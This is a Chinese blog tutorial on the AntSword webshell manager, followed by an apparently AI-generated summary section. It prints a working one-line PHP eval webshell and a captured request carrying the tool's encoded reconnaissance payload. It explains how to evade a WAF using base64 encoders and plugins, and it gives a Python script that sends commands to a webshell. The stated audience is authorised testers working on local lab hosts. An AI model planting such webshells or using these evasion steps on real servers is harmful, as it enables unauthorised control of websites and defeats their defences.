中国蚁剑安装使用教程

本文是中国蚁剑的详细使用教程,包括安装、连接木马、设置代理和参数,以及如何通过编码、插件和修改蚁剑来绕过WAF。教程适合安全测试人员和网站管理员参考。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >


大家好,我是the-back-zoom,如下是中国蚁剑安装使用教程,拒绝水文,从我做起

前言


中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

一、中国蚁剑安装

中国蚁剑安装教程_ccc123ccccc的博客-CSDN博客_rab3it

中国蚁剑的安装直接看这个人写的博客,安装不难,所以我直接讲中国蚁剑的使用

二、中国蚁剑使用

2.1中国蚁剑连接木马

我的服务器地址是192.168.93.129(本地服务器),所以我在根目录下面创建了muma.php文件,文件中的内容如下所示:

<?php @eval($_POST['1']); ?>

类容是一句话木马,连接密码是1.

  1. 右键点击添加数据

在这里插入图片描述

  1. url填写http://192.168.93.129/muma.php

在这里插入图片描述

如上所示,点击测试连接,可以查看是否能够连接成功,点击添加就可以进行如下操作下:

在这里插入图片描述

2.2中国蚁剑设置代理

  1. 首先点击设置

在这里插入图片描述

  1. 进行相应的配置

在这里插入图片描述
在这里插入图片描述

  1. 配置正确点击测试连接就可以进行抓包

    点击正上方的测试连接

在这里插入图片描述

2.3中国蚁剑参数设置

如下所示,是http包的相应的参数

POST /muma.php HTTP/1.1
Host: 192.168.93.129:80
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 983
Connection: close

1=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%2230618%22%3Becho%20%40asenc(%24output)%3Becho%20%227a2d1%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B

如上所示,如果需要添加请求行的参数,或者是POST传递的参数,该如何搞了:

在这里插入图片描述

在添加数据下有请求信息配置,如何配置如上所示:如下是其他配置:

在这里插入图片描述

2.4中国蚁剑其他使用

在这里插入图片描述

三、 中国蚁剑绕过Waf

3.1 编码绕过WAF

在这里插入图片描述

设置不同的编码器和解码器可以绕过waf,如下所示:

我的服务器地址是192.168.93.134(本地服务器),所以我在根目录下面创建了muma.php文件,文件中的内容如下所示:

<?php @eval($_POST['1']); ?>

类容是一句话木马,连接密码是1.

  1. 右键点击添加数据

在这里插入图片描述

  1. url填写http://192.168.93.134/muma.php,然后点击测试连接,连接成功(没有开启安全狗)

在这里插入图片描述

开启安全狗连接失败,更改为base64编码器,又连接成功,如下所示:

  • 开启安全狗

在这里插入图片描述

基本上开启了waf,你就很难进行连接了,触发waf版本很老

3.2插件绕过waf

在这里插入图片描述

如上所示,点击插件市场,进行插件下载

在这里插入图片描述

由于shell不断在跟新,waf也在跟新,下载什么插件绕过只能够自己尝试

3.3 修改蚁剑绕过WAF

如下文章,是比较好的绕过waf的手段

蚁剑改造过WAF系列(一) - 0DayBug - 博客园 (cnblogs.com)

总结

如上主要包括蚁剑的下载,连接一句话木马,更改木马连接参数,绕过WAF

### 关于中国 (AntSword) 的使用教程 #### 安装过程 中国是一款开源的跨平台 Webshell 管理工具,适用于合法授权的安全测试人员和网站管理员。其安装过程相对简单,支持 Windows、Linux 和 macOS 平台。 1. **下载文件**: 需要分别下载项目核心源码 (`antSword`) 和加载器 (`loader`)[^4]。加载器提供了不同操作系统对应的版本。 2. **解压并运行**: 将 `AntSword-Loader-vX.X.X-os-version.zip` 解压缩到目标目录后,双击可执行文件(如 `AntSword.exe`),等待初始化完成后再重新启动程序即可正常使用[^4]。 --- #### 基本配置与连接设置 在成功安装之后,可以通过以下步骤创建一个新的会话来管理远程服务器上的 Webshell: 1. 打开软件界面,在左侧导航栏点击“新建站点”按钮。 2. 输入目标 URL 地址以及上传路径等相关参数。例如: - **URL**: http://example.com/shell.php - **密码**: 如果存在加密机制,则需填写正确的密钥或密码。 3. 设置编码方式和其他高级选项(如果必要的话)[^3]。 --- #### 功能模块介绍 中国不仅提供基本的命令执行功能,还集成了许多实用特性以增强用户体验: - 文件管理:允许浏览、编辑甚至删除远端主机中的任意文件; - 数据库交互:能够直接查询 MySQL 或其他类型的数据库表单数据; - 终端模拟器:内置 SSH/Telnet 支持以便更高效地控制 Linux 服务端实例; - 插件扩展:通过第三方插件进一步扩充应用范围[^2]。 以下是实现某些特定任务时可能需要用到的一些 Python 脚本片段作为示例展示如何调用 API 接口自动化处理流程的一部分逻辑代码: ```python import requests def send_command(url, password, command): payload = {'password': password, 'cmd': command} response = requests.post(url, data=payload) return response.text if __name__ == "__main__": url = "http://target-site/web-shell-path" passwd = "your-webshell-password" cmd = "whoami" result = send_command(url, passwd, cmd) print(result.strip()) ``` 此脚本发送 POST 请求给指定的目标地址,并附带所需的身份验证凭据及待执行的具体指令字符串内容[^1]。 --- #### 注意事项 尽管该工具有助于提高工作效率,但在未经授权的情况下擅自访问他人计算机系统属于违法行为,请务必遵循当地法律法规合理运用此类技术手段[^2]。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

三年之约-第二年

你的鼓励是对我最大的鼓励

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值